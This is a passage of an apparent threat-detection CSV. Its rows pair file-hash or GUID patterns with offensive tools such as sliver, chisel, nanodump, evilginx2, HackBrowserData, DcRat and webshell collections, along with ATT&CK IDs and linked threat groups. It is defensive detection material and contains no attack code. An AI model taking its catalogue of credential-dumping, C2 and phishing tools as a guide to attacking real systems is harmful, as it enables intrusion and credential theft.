- TA0010 - 
TA0011","N/A","N/A","C2","https://github.com/picosh/pico","1","0","#filehash","N/A","10","10","1129","36","2025-04-22T17:33:17Z","2022-08-24T03:14:52Z","31475" "*968cfebad222f175df52b968f5479b7ac8f06a7bde32a47d2bada49ca09cad70*",".{0,1000}968cfebad222f175df52b968f5479b7ac8f06a7bde32a47d2bada49ca09cad70.{0,1000}","offensive_tool_keyword","Group3r","Find vulnerabilities in AD Group Policy","T1484.002 - T1069.002 - T1087.002","TA0007 - TA0040","N/A","KNOTWEED","Discovery","https://github.com/Group3r/Group3r","1","0","#filehash","AD Enumeration","7","8","781","68","2025-04-08T05:03:34Z","2021-07-05T05:05:42Z","31476" "*968f17d5151addd34a19ca654a5ede75b8f6d0f079a3dd967cf2f857bfeed193*",".{0,1000}968f17d5151addd34a19ca654a5ede75b8f6d0f079a3dd967cf2f857bfeed193.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","31477" "*96920d601c95d13be934e071544eda074e9b36329e0b53735214519434aa41a0*",".{0,1000}96920d601c95d13be934e071544eda074e9b36329e0b53735214519434aa41a0.{0,1000}","offensive_tool_keyword","ShadowDumper","dump LSASS memory","T1003.001 - T1055","TA0006 ","N/A","N/A","Credential Access","https://github.com/Offensive-Panda/ShadowDumper","1","0","#filehash","N/A","10","6","521","83","2025-04-05T08:32:28Z","2024-11-10T15:26:28Z","31478" "*969402c4db5ce5946e2fb9242385a5e21328780ae6848f133172b00506706263*",".{0,1000}969402c4db5ce5946e2fb9242385a5e21328780ae6848f133172b00506706263.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense 
Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","31479" "*96a355ad3176a2753b403b71f5e39c36dfb0489b621822f7da459519ed6bc4be*",".{0,1000}96a355ad3176a2753b403b71f5e39c36dfb0489b621822f7da459519ed6bc4be.{0,1000}","offensive_tool_keyword","pwcrack-framework","Password Crack Framework","T1110 - T1003 - T1059","TA0006","N/A","N/A","Credential Access","https://github.com/L-codes/pwcrack-framework","1","0","#filehash","N/A","10","6","515","59","2024-02-25T13:08:56Z","2018-07-01T08:33:55Z","31484" "*96a4fbd501eb610e8183699b4fe209dcc30952e86c0fac80ea5808addc3d30cb*",".{0,1000}96a4fbd501eb610e8183699b4fe209dcc30952e86c0fac80ea5808addc3d30cb.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","31485" "*96a9a57590a8a235b89ac16face003d83198b27e6841fcd35de89f0f710a226e*",".{0,1000}96a9a57590a8a235b89ac16face003d83198b27e6841fcd35de89f0f710a226e.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","31486" "*96aaf948fb2eef6f40f56164125e6dcd819e09c444f569c1a2a7df1ec0b009d7*",".{0,1000}96aaf948fb2eef6f40f56164125e6dcd819e09c444f569c1a2a7df1ec0b009d7.{0,1000}","offensive_tool_keyword","lolminer","NVIDIA+AMD GPU Miner","T1496","TA0040","N/A","N/A","Cryptomining","https://github.com/Lolliedieb/lolMiner-releases","1","0","#filehash","N/A","9","10","2781","601","2025-02-01T20:03:57Z","2018-10-27T20:35:03Z","31487" 
"*96b452bde52ca91033ed91f188d4c4e0eba7976a217bb474666428ba84f7cf3d*",".{0,1000}96b452bde52ca91033ed91f188d4c4e0eba7976a217bb474666428ba84f7cf3d.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","31490" "*96c4151c60a745d0ad96649cd6589dd28fb8e4761de75a425965315a3aab2d62*",".{0,1000}96c4151c60a745d0ad96649cd6589dd28fb8e4761de75a425965315a3aab2d62.{0,1000}","offensive_tool_keyword","Minimalistic-offensive","A repository of tools for pentesting of restricted and isolated environments.","T1110 - T1046 - T1021 - T1203 - T1485","TA0006 - TA0007 - TA0008","N/A","Dispossessor","Discovery","https://github.com/InfosecMatter/Minimalistic-offensive-security-tools","1","0","#filehash","N/A","7","6","562","121","2021-10-26T11:04:46Z","2020-05-10T17:40:31Z","31491" "*96c7a830d1ec55b1db8892e1d452394cd2a5eb2549003d4428b5d52774637e94*",".{0,1000}96c7a830d1ec55b1db8892e1d452394cd2a5eb2549003d4428b5d52774637e94.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. 
Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","31492" "*96c9648216ca09c9c7980f414eff4095815123f0b8404caed883c361ff77b85f*",".{0,1000}96c9648216ca09c9c7980f414eff4095815123f0b8404caed883c361ff77b85f.{0,1000}","offensive_tool_keyword","Group3r","Find vulnerabilities in AD Group Policy","T1484.002 - T1069.002 - T1087.002","TA0007 - TA0040","N/A","KNOTWEED","Discovery","https://github.com/Group3r/Group3r","1","0","#filehash","AD Enumeration","7","8","781","68","2025-04-08T05:03:34Z","2021-07-05T05:05:42Z","31494" "*96cff9ea19fa5ef9e119e9b00f67d9744efa55bd15df77248201ac09050d8322*",".{0,1000}96cff9ea19fa5ef9e119e9b00f67d9744efa55bd15df77248201ac09050d8322.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","31496" "*96da4a94f18030d87385e954b03d72c51aa2209acc07fd947ef83b89443c905e*",".{0,1000}96da4a94f18030d87385e954b03d72c51aa2209acc07fd947ef83b89443c905e.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","31498" "*96dbae48dbdc89b918377d94b26393e214655b42b56044402e15046d9ecccf97*",".{0,1000}96dbae48dbdc89b918377d94b26393e214655b42b56044402e15046d9ecccf97.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","Malware","https://github.com/qwqdanchun/DcRat","1","0","#filehash","N/A","10","10","968","332","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z","31499" "*96e38545cc3afc9f9acfbe1e34537d0c8dd13c4684c60e563051fe9fe462db5e*",".{0,1000}96e38545cc3afc9f9acfbe1e34537d0c8dd13c4684c60e563051fe9fe462db5e.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","#filehash","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","31501" "*96eefe6053e8028293510afe996aeab1c245d9c0bcf8d77f5be4cb181306a850*",".{0,1000}96eefe6053e8028293510afe996aeab1c245d9c0bcf8d77f5be4cb181306a850.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 
- T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","31502" "*9708b182a7e712892b7750c50a36ffadd3983e2874269740c05650f979ede361*",".{0,1000}9708b182a7e712892b7750c50a36ffadd3983e2874269740c05650f979ede361.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043 - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","31508" "*970c07b17ca0d662ea2c5b0958efcf8e28053ee8d2a2c78436cce460413933b1*",".{0,1000}970c07b17ca0d662ea2c5b0958efcf8e28053ee8d2a2c78436cce460413933b1.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","31509" "*9711738fbc89cd6b37366690193dfdd6402af920106426ff9d33aae65eaba5c8*",".{0,1000}9711738fbc89cd6b37366690193dfdd6402af920106426ff9d33aae65eaba5c8.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","31510" 
"*971193eea29201f09ab21c42b5d03c63a5509d81b42158c2cf2b81bc8851ee8b*",".{0,1000}971193eea29201f09ab21c42b5d03c63a5509d81b42158c2cf2b81bc8851ee8b.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","31511" "*971EA5AE1205C3DC4693EED2C730D21E00022E9EA17D5928C2695749D68BB7A7*",".{0,1000}971EA5AE1205C3DC4693EED2C730D21E00022E9EA17D5928C2695749D68BB7A7.{0,1000}","offensive_tool_keyword","Dispossessor","Dispossessor ransomware scripts and binaries","T1486 - T1489 - T1490 - T1107 - T1059 - T1001","TA0040 - TA0042","N/A","Dispossessor","Ransomware ","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","31513" "*971f7d595c07fa302de6843e85ae22c771bc23a790f4092b5e6cd62fac985ab0*",".{0,1000}971f7d595c07fa302de6843e85ae22c771bc23a790f4092b5e6cd62fac985ab0.{0,1000}","offensive_tool_keyword","AMSITrigger","AMSITrigger will identify all of the malicious strings in a powershell file by repeatedly making calls to AMSI using AMSIScanBuffer - line by line. 
On receiving an AMSI_RESULT_DETECTED response code the line will then be scrutinised to identify the individual triggers","T1059.001 - T1218.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/RythmStick/AMSITrigger","1","0","#filehash","https://www.rythmstick.net/posts/amsitrigger/","10","10","1195","166","2022-08-21T22:37:23Z","2020-05-27T09:17:19Z","31514" "*972963c83a5b6277233d9c33536b666a296b02137a267f685f7845e0b848d10b*",".{0,1000}972963c83a5b6277233d9c33536b666a296b02137a267f685f7845e0b848d10b.{0,1000}","offensive_tool_keyword","macro_pack","The macro_pack is a tool used to automatize obfuscation and generation of retro formats such as MS Office documents or VBS like format. Now it also handles various shortcuts formats.","T1587 - T1588 - T1027 - T1204 ","TA0005 - TA0002 - TA0008 - TA0011 - TA0042","N/A","Black Basta","Resource Development","https://github.com/sevagas/macro_pack","1","0","#filehash","N/A","10","10","2241","412","2024-08-15T14:21:39Z","2017-10-03T18:30:06Z","31516" "*9734db4d2d53bb15ae0f8214595a7a781df78445811dd5d1a16319dea549ea39*",".{0,1000}9734db4d2d53bb15ae0f8214595a7a781df78445811dd5d1a16319dea549ea39.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","#filehash","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","31518" "*9738590e365bc9b2c9baecbdbda391f294e1b991fe3744ac4b8c2107bf730565*",".{0,1000}9738590e365bc9b2c9baecbdbda391f294e1b991fe3744ac4b8c2107bf730565.{0,1000}","offensive_tool_keyword","gTunnel","tunneling solution written in golang","T1573.002 - T1071 - T1090 - T1105 - T1020","TA0005 - TA0010 - TA0008 - 
TA0011","N/A","N/A","C2","https://github.com/hotnops/gTunnel","1","0","#filehash","N/A","10","10","266","49","2023-05-17T05:24:58Z","2020-03-09T02:52:48Z","31519" "*973d217af2a0f2b65c7000cffa1fea57cb816d97bb41775201342138029f132d*",".{0,1000}973d217af2a0f2b65c7000cffa1fea57cb816d97bb41775201342138029f132d.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","31520" "*97484211-4726-4129-86AA-AE01D17690BE*",".{0,1000}97484211\-4726\-4129\-86AA\-AE01D17690BE.{0,1000}","offensive_tool_keyword","SharpClipboard","monitor the content of the clipboard continuously","T1115","TA0006 - TA0009","N/A","N/A","Credential Access","http://github.com/slyd0g/SharpClipboard","1","0","#GUIDProject","N/A","8","1","N/A","N/A","N/A","N/A","31521" "*9748cdfecb95fd7bb1706a566e79d3fccb1418bbb4307f7a7a1de1809db83afe*",".{0,1000}9748cdfecb95fd7bb1706a566e79d3fccb1418bbb4307f7a7a1de1809db83afe.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","31522" "*97499fbdae8e2c952f21da5834caf06b11dcc28d74b034b509bd174f3d1f1739*",".{0,1000}97499fbdae8e2c952f21da5834caf06b11dcc28d74b034b509bd174f3d1f1739.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - 
COLDRIVER","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","31523" "*974cf826367e6b3bd96006f325a549d892da924bf76afc7df546e31ede536696*",".{0,1000}974cf826367e6b3bd96006f325a549d892da924bf76afc7df546e31ede536696.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#filehash #linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","31526" "*975b49f84c3e34d26052f938c50aa5856cccbbdf32e9e4698cebba577ed10c8c*",".{0,1000}975b49f84c3e34d26052f938c50aa5856cccbbdf32e9e4698cebba577ed10c8c.{0,1000}","offensive_tool_keyword","Carseat","Python implementation of GhostPack Seatbelt situational awareness tool","T1012 - T1082 - T1087 - T1124 - T1217","TA0006 - TA0007 - TA0009","N/A","N/A","Collection","https://github.com/0xthirteen/Carseat","1","0","#filehash","N/A","8","3","257","21","2024-11-12T19:37:38Z","2024-11-08T02:08:53Z","31528" "*97646f306c4b95f9733ee383923b7b8c954cd74715ff548ea42c8ae18fb2f67d*",".{0,1000}97646f306c4b95f9733ee383923b7b8c954cd74715ff548ea42c8ae18fb2f67d.{0,1000}","offensive_tool_keyword","Tsunami","another C2 framework","T1573 - T1027 - T1059 - T1071 ","TA0011 - TA0009 - TA0003 - TA0007 - TA0008","N/A","N/A","C2","https://github.com/trustedsec/The_Shelf","1","0","#filehash","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","31530" "*97699449246070bc8195e1cf1f14b94dc2ee429cb03128bb7e7e254981eb71a0*",".{0,1000}97699449246070bc8195e1cf1f14b94dc2ee429cb03128bb7e7e254981eb71a0.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. 
A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","Dispossessor","Credential Access","https://github.com/fortra/nanodump","1","0","#filehash","N/A","10","10","1918","249","2024-09-17T22:58:11Z","2021-11-10T18:28:15Z","31531" "*976be04b1a0791888458a62b8218aa07452684394512e4c49add14aadc036eac*",".{0,1000}976be04b1a0791888458a62b8218aa07452684394512e4c49add14aadc036eac.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","31532" "*9786E418-6C4A-471D-97C0-8B5F2ED524C8*",".{0,1000}9786E418\-6C4A\-471D\-97C0\-8B5F2ED524C8.{0,1000}","offensive_tool_keyword","SharpBuster","This is a C# implementation of a directory brute forcing tool designed to allow for in-memory execution","T1087 - T1112 - T1048.003 - T1105","TA0007 - TA0040 - TA0002","N/A","N/A","Discovery","https://github.com/passthehashbrowns/SharpBuster","1","0","#GUIDproject","N/A","7","1","62","7","2020-09-02T15:46:03Z","2020-08-31T00:33:02Z","31534" "*978dbbb6bf4794203430805e3cfe01ae52b0bed20f4c4c88d7117ecf6b6a138a*",".{0,1000}978dbbb6bf4794203430805e3cfe01ae52b0bed20f4c4c88d7117ecf6b6a138a.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","31535" 
"*979ace218709961112c1d80bfac298c5cf6b2b92a798b0af012aab2dd45ba2c1*",".{0,1000}979ace218709961112c1d80bfac298c5cf6b2b92a798b0af012aab2dd45ba2c1.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","31538" "*97ab5a4ff291a46ece4aebafa570869cbb74a5a285769c641c257cdbbf13744f*",".{0,1000}97ab5a4ff291a46ece4aebafa570869cbb74a5a285769c641c257cdbbf13744f.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","31539" "*97b39ac28794a7610ed83ad65e28c605397ea7be878109c35228c126d43e2f46*",".{0,1000}97b39ac28794a7610ed83ad65e28c605397ea7be878109c35228c126d43e2f46.{0,1000}","offensive_tool_keyword","fgdump","A utility for dumping passwords on Windows NT/2000/XP/2003 machines","T1003.001 - T1003.002 - T1077 - T1059 - T1035 - T1021.002 - T1562.001","TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0008","N/A","Volt Typhoon","Credential Access","https://github.com/ihamburglar/fgdump","1","0","#filehash","N/A","10","1","8","4","2012-01-14T19:05:42Z","2015-10-11T17:08:47Z","31540" "*97b5f34a741ea6fd544439fbd6614de3960e82ae56c8ef02399ea8935816994d*",".{0,1000}97b5f34a741ea6fd544439fbd6614de3960e82ae56c8ef02399ea8935816994d.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","31542" 
"*97b8b52dd9cc10504a350236aa9dc2fc91a9162c013189004c1b13e189d21dea*",".{0,1000}97b8b52dd9cc10504a350236aa9dc2fc91a9162c013189004c1b13e189d21dea.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#filehash","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","31543" "*97b8d3a33ca3a06d24553a8ea8a5a89520ebe15655fa338b2f7c7c8883ae38da*",".{0,1000}97b8d3a33ca3a06d24553a8ea8a5a89520ebe15655fa338b2f7c7c8883ae38da.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Framework","https://github.com/JoelGMSec/AutoRDPwn","1","0","#filehash","N/A","10","10","1103","499","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z","31544" "*97c0e103700b9f2464000cb63e10b68a4305dd33*",".{0,1000}97c0e103700b9f2464000cb63e10b68a4305dd33.{0,1000}","offensive_tool_keyword","PowerLess","PowerShell-based modular backdoor that has been used by Magic Hound group","T1560 - T1217 - T1059.001 - T1005 - T1074.001 - T1140 - T1573 - T1105 - T1056.001","TA0011 - TA0009 - TA0010 - TA0005 - TA0002 - TA0006","N/A","Magic Hound","Malware","https://gist.github.com/farzinenddo/bb1f1ecb56aa9326abc7b47fc99e588e","1","0","#filehash","N/A","10","4","N/A","N/A","N/A","N/A","31546" "*97c42a422ddd966681ffad0b5bae3df1203f52b11c5be3a14bcdd76366c1f369*",".{0,1000}97c42a422ddd966681ffad0b5bae3df1203f52b11c5be3a14bcdd76366c1f369.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - 
T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","31548" "*97cb8247ff30cc1aa0bfd279da92894f288e4bc985441f10ababfe22caed984e*",".{0,1000}97cb8247ff30cc1aa0bfd279da92894f288e4bc985441f10ababfe22caed984e.{0,1000}","offensive_tool_keyword","antSword","cross-platform website management toolkit - abused by attackers - supports the use of web shells","T1505.003 - T1059 - T1100 - T1027 - T1219 - T1071","TA0002 - TA0003 - TA0005 - TA0011","antSword webshell","APT41 - APT15","C2","https://github.com/AntSwordProject/antSword","1","0","#filehash","N/A","10","10","4010","616","2025-01-20T12:48:42Z","2016-03-11T09:28:00Z","31550" "*97d1243475c5ef51df1ff21894d4e586742855c345e10938adcdfaf9dbb9a147*",".{0,1000}97d1243475c5ef51df1ff21894d4e586742855c345e10938adcdfaf9dbb9a147.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","31551" "*97d14bd510bfca62bca0d884ad7953e044355e4d1cc198471b678f4201e5eb02*",".{0,1000}97d14bd510bfca62bca0d884ad7953e044355e4d1cc198471b678f4201e5eb02.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - 
TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","31552" "*97d5f4e3388f23242edbd69a62412396e557290ac5b8f468c625255fbbc4546b*",".{0,1000}97d5f4e3388f23242edbd69a62412396e557290ac5b8f468c625255fbbc4546b.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","31553" "*97de480818edd99fc1a118eb9e832db08910eb44cc3b53ebfd534b6c3afe4ee4*",".{0,1000}97de480818edd99fc1a118eb9e832db08910eb44cc3b53ebfd534b6c3afe4ee4.{0,1000}","offensive_tool_keyword","p0wnedShell","p0wnedShell is an offensive PowerShell host application written in C# that does not rely on powershell.exe but runs powershell commands and functions within a powershell runspace environment (.NET). It has a lot of offensive PowerShell modules and binaries included to make the process of Post Exploitation easier. What we tried was to build an 'all in one' Post Exploitation tool which we could use to bypass all mitigations solutions (or at least some off). and that has all relevant tooling included. 
You can use it to perform modern attacks within Active Directory environments and create awareness within your Blue team so they can build the right defense strategies.","T1086 - T1059 - T1106 - T1566","TA0002 - TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/Cn33liz/p0wnedShell","1","0","#filehash","N/A","9","10","1535","335","2019-08-02T16:24:39Z","2015-12-25T11:44:37Z","31555" "*97e2d2cf16103f9149b1fcf33d5e982fb9f37f0bbbadfe787634b277b5f65f78*",".{0,1000}97e2d2cf16103f9149b1fcf33d5e982fb9f37f0bbbadfe787634b277b5f65f78.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","31556" "*97e6a954a2bb21afcc7eeab6ec6d95c6c174ebb7b5fd1da881ab51f74dc944c7*",".{0,1000}97e6a954a2bb21afcc7eeab6ec6d95c6c174ebb7b5fd1da881ab51f74dc944c7.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 